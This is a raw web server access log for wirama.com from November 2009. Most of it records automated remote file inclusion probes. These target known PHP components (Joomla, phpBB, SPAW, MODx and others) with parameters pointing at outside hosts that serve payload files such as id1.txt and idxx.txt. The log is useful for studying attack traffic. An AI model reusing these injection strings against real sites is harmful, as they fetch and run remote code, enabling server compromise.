122.199.140.158 - - [02/Nov/2009:08:44:55 -0800] "GET /logs/access_090801.log//setup.php?%20dir=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.172.33.230 - - [02/Nov/2009:08:48:39 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://e-healthcaresystems.com/modules/tinycontent//admin/spaw/yes.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
209.172.33.230 - - [02/Nov/2009:08:48:39 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://e-healthcaresystems.com/modules/tinycontent//admin/spaw/yes.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
66.249.85.67 - - [02/Nov/2009:08:49:43 -0800] "GET / HTTP/1.1" 200 916 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; feed-id=11572357192736681981)" "www.wirama.com"
213.0.87.125 - - [02/Nov/2009:08:52:33 -0800] "GET /logs//components/com_banners/configuration.php=http://www.miomatrimonio.com/editor/perkosa.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
213.0.87.125 - - [02/Nov/2009:08:52:33 -0800] "GET /components/com_banners/configuration.php=http://www.miomatrimonio.com/editor/perkosa.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
213.0.87.125 - - [02/Nov/2009:08:52:53 -0800] "GET /components/com_banners/configuration.php=http://www.miomatrimonio.com/editor/perkosa.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
213.0.87.125 - - [02/Nov/2009:08:52:53 -0800] "GET /logs//components/com_banners/configuration.php=http://www.miomatrimonio.com/editor/perkosa.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
213.0.87.125 - - [02/Nov/2009:08:52:53 -0800] "GET /components/com_banners/configuration.php=http://www.miomatrimonio.com/editor/perkosa.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
213.0.87.125 - - [02/Nov/2009:08:52:53 -0800] "GET /logs//components/com_banners/configuration.php=http://www.miomatrimonio.com/editor/perkosa.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
213.0.87.125 - - [02/Nov/2009:08:54:18 -0800] "GET /components/com_banners/configuration.php=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.125 - - [02/Nov/2009:08:54:18 -0800] "GET /logs/access_090330.log//components/com_banners/configuration.php=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.125 - - [02/Nov/2009:08:54:18 -0800] "GET /logs//components/com_banners/configuration.php=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.230.123.88 - - [02/Nov/2009:08:54:44 -0800] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.123.88 - - [02/Nov/2009:08:54:44 -0800] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.123.88 - - [02/Nov/2009:08:54:44 -0800] "GET /logs/access_090801.log///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.238.2.226 - - [02/Nov/2009:08:55:12 -0800] "GET /logs/access_090801.log///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.238.2.226 - - [02/Nov/2009:08:55:12 -0800] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.238.2.226 - - [02/Nov/2009:08:55:12 -0800] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.78.112.195 - - [02/Nov/2009:08:56:58 -0800] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.78.112.195 - - [02/Nov/2009:08:56:59 -0800] "GET /logs/access_090801.log///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.78.112.195 - - [02/Nov/2009:08:56:59 -0800] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.125 - - [02/Nov/2009:09:00:33 -0800] "GET /logs//components/com_banners/configuration.php=http://www.miomatrimonio.com/editor/perkosa.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
213.0.87.125 - - [02/Nov/2009:09:00:33 -0800] "GET /components/com_banners/configuration.php=http://www.miomatrimonio.com/editor/perkosa.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
58.230.123.88 - - [02/Nov/2009:09:01:11 -0800] "GET /logs/access_090331.log///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.123.88 - - [02/Nov/2009:09:01:18 -0800] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.123.88 - - [02/Nov/2009:09:01:18 -0800] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.123.88 - - [02/Nov/2009:09:01:18 -0800] "GET /logs/access_090801.log///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.123.88 - - [02/Nov/2009:09:01:25 -0800] "GET /logs/access_090331.log///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.125 - - [02/Nov/2009:09:01:36 -0800] "GET /components/com_banners/configuration.php=http://www.miomatrimonio.com/editor/perkosa.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
213.0.87.125 - - [02/Nov/2009:09:01:36 -0800] "GET /logs//components/com_banners/configuration.php=http://www.miomatrimonio.com/editor/perkosa.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
58.230.123.88 - - [02/Nov/2009:09:01:47 -0800] "GET /logs/access_090331.log///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.125 - - [02/Nov/2009:09:02:04 -0800] "GET /logs/access_090330.log//components/com_banners/configuration.php=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.125 - - [02/Nov/2009:09:02:04 -0800] "GET /logs//components/com_banners/configuration.php=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.125 - - [02/Nov/2009:09:02:04 -0800] "GET /components/com_banners/configuration.php=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.230.123.88 - - [02/Nov/2009:09:02:16 -0800] "GET /logs/access_090401.log///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
63.174.244.10 - - [02/Nov/2009:09:03:29 -0800] "GET /logs/access_090801.log///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
63.174.244.10 - - [02/Nov/2009:09:03:29 -0800] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
63.174.244.10 - - [02/Nov/2009:09:03:30 -0800] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
63.174.244.10 - - [02/Nov/2009:09:04:21 -0800] "GET /logs/access_090331.log///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.125 - - [02/Nov/2009:09:08:38 -0800] "GET /logs//components/com_banners/configuration.php=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.125 - - [02/Nov/2009:09:08:38 -0800] "GET /components/com_banners/configuration.php=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [02/Nov/2009:09:09:54 -0800] "GET /logs/access_090329.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [02/Nov/2009:09:09:54 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [02/Nov/2009:09:09:54 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.125 - - [02/Nov/2009:09:10:26 -0800] "GET /logs/access_090330.log//components/com_banners/configuration.php=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [02/Nov/2009:09:12:14 -0800] "GET /logs/access_090330.log//components/com_banners/configuration.php=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.171.225.234 - - [02/Nov/2009:09:12:14 -0800] "GET /components/com_banners/configuration.php=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.171.225.234 - - [02/Nov/2009:09:12:14 -0800] "GET /logs//components/com_banners/configuration.php=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.125 - - [02/Nov/2009:09:12:20 -0800] "GET /logs//components/com_user/configuration.php=http://www.miomatrimonio.com/editor/perkosa.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
213.0.87.125 - - [02/Nov/2009:09:12:20 -0800] "GET /components/com_user/configuration.php=http://www.miomatrimonio.com/editor/perkosa.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
213.0.87.125 - - [02/Nov/2009:09:12:24 -0800] "GET /logs//components/com_user/configuration.php=http://www.miomatrimonio.com/editor/perkosa.txt?%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "wirama.com"
213.0.87.125 - - [02/Nov/2009:09:12:25 -0800] "GET /components/com_user/configuration.php=http://www.miomatrimonio.com/editor/perkosa.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
213.0.87.125 - - [02/Nov/2009:09:12:28 -0800] "GET /components/com_user/configuration.php=http://www.miomatrimonio.com/editor/perkosa.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
213.0.87.125 - - [02/Nov/2009:09:12:31 -0800] "GET /logs//components/com_user/configuration.php=http://www.miomatrimonio.com/editor/perkosa.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
65.55.51.114 - - [02/Nov/2009:09:12:36 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
202.30.48.8 - - [02/Nov/2009:09:13:33 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [02/Nov/2009:09:13:33 -0800] "GET /logs/access_090329.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [02/Nov/2009:09:13:33 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.51.114 - - [02/Nov/2009:09:13:49 -0800] "GET /?S=A HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
77.73.98.177 - - [02/Nov/2009:09:15:01 -0800] "GET /logs/access_090330.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.73.98.177 - - [02/Nov/2009:09:15:01 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.73.98.177 - - [02/Nov/2009:09:15:01 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.73.98.177 - - [02/Nov/2009:09:15:02 -0800] "GET /logs/access_090330.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.73.98.177 - - [02/Nov/2009:09:15:03 -0800] "GET /logs/access_090401.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.73.98.177 - - [02/Nov/2009:09:15:03 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.73.98.177 - - [02/Nov/2009:09:15:03 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.73.98.177 - - [02/Nov/2009:09:15:05 -0800] "GET /logs/access_090401.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.44 - - [02/Nov/2009:09:33:45 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.44 - - [02/Nov/2009:09:33:46 -0800] "GET /logs/access_090201.log HTTP/1.1" 200 0 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
213.171.225.234 - - [02/Nov/2009:09:41:41 -0800] "GET /logs/access_090330.log//components/com_banners/configuration.php=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [02/Nov/2009:09:41:41 -0800] "GET /components/com_banners/configuration.php=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [02/Nov/2009:09:41:41 -0800] "GET /logs//components/com_banners/configuration.php=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.131.106.33 - - [02/Nov/2009:09:41:48 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.wirama.com"
88.131.106.33 - - [02/Nov/2009:09:42:00 -0800] "GET /pr02.htm HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.wirama.com"
213.171.225.234 - - [02/Nov/2009:09:43:16 -0800] "GET /logs/access_090330.log//components/com_banners/configuration.php=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [02/Nov/2009:09:43:16 -0800] "GET /logs//components/com_banners/configuration.php=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [02/Nov/2009:09:43:16 -0800] "GET /components/com_banners/configuration.php=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.217 - - [02/Nov/2009:09:47:02 -0800] "GET /modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.217 - - [02/Nov/2009:09:47:02 -0800] "GET /logs//modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.217 - - [02/Nov/2009:09:47:02 -0800] "GET /logs/access_090601.log//modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.217 - - [02/Nov/2009:09:47:02 -0800] "GET /logs/access_090731.log//modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [02/Nov/2009:09:48:28 -0800] "GET /logs/access_090601.log/login.php?dir=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [02/Nov/2009:09:48:28 -0800] "GET /logs/access_090331.log/login.php?dir=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [02/Nov/2009:09:48:28 -0800] "GET /logs/login.php?dir=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [02/Nov/2009:09:48:28 -0800] "GET /login.php?dir=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.207.126 - - [02/Nov/2009:09:48:58 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
66.244.236.249 - - [02/Nov/2009:09:54:05 -0800] "GET /logs/access_090731.log/?_zb_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [02/Nov/2009:09:54:05 -0800] "GET /?_zb_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [02/Nov/2009:09:54:05 -0800] "GET /logs/?_zb_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 200 3429 "-" "Mozilla/5.0" "wirama.com"
65.55.207.126 - - [02/Nov/2009:09:56:43 -0800] "GET / HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
174.133.224.138 - - [02/Nov/2009:10:00:51 -0800] "GET /logs/access_090331.log/login.php?dir=http://www.morroalto.tur.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
174.133.224.138 - - [02/Nov/2009:10:00:51 -0800] "GET /login.php?dir=http://www.morroalto.tur.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
174.133.224.138 - - [02/Nov/2009:10:00:51 -0800] "GET /logs/login.php?dir=http://www.morroalto.tur.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [02/Nov/2009:10:04:02 -0800] "GET /logs/access_090801.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.douglaschem.com//bbs/icon/private_name/.cpanel/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [02/Nov/2009:10:04:02 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.douglaschem.com//bbs/icon/private_name/.cpanel/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [02/Nov/2009:10:04:02 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.douglaschem.com//bbs/icon/private_name/.cpanel/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [02/Nov/2009:10:05:40 -0800] "GET /logs/access_090801.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.douglaschem.com//bbs/icon/private_name/.cpanel/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [02/Nov/2009:10:05:40 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.douglaschem.com//bbs/icon/private_name/.cpanel/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [02/Nov/2009:10:05:40 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.douglaschem.com//bbs/icon/private_name/.cpanel/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
174.133.224.138 - - [02/Nov/2009:10:09:16 -0800] "GET /logs/access_090601.log/login.php?dir=http://www.morroalto.tur.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.125 - - [02/Nov/2009:10:16:22 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.125 - - [02/Nov/2009:10:16:22 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.125 - - [02/Nov/2009:10:16:22 -0800] "GET /logs/access_090801.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.125 - - [02/Nov/2009:10:16:22 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.125 - - [02/Nov/2009:10:16:22 -0800] "GET /logs/access_090701.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.125 - - [02/Nov/2009:10:16:25 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.125 - - [02/Nov/2009:10:16:37 -0800] "GET /logs/access_090601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.131.106.33 - - [02/Nov/2009:10:17:50 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.wirama.com"
88.131.106.33 - - [02/Nov/2009:10:17:53 -0800] "GET /pr02.htm HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.wirama.com"
64.34.111.74 - - [02/Nov/2009:10:20:24 -0800] "GET /logs//template/album.php?SECURITY_FILE=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.34.111.74 - - [02/Nov/2009:10:20:24 -0800] "GET /logs/access_090731.log//template/album.php?SECURITY_FILE=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.34.111.74 - - [02/Nov/2009:10:20:24 -0800] "GET /template/album.php?SECURITY_FILE=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.195.111.57 - - [02/Nov/2009:10:20:59 -0800] "GET /?D=D HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
64.34.111.74 - - [02/Nov/2009:10:22:30 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.34.111.74 - - [02/Nov/2009:10:22:30 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.34.111.74 - - [02/Nov/2009:10:22:30 -0800] "GET /logs/access_090701.log//modules/agendax/addevent.inc.php?agendax_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.34.111.74 - - [02/Nov/2009:10:22:45 -0800] "GET /logs/access_090701.log//modules/agendax/addevent.inc.php?agendax_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
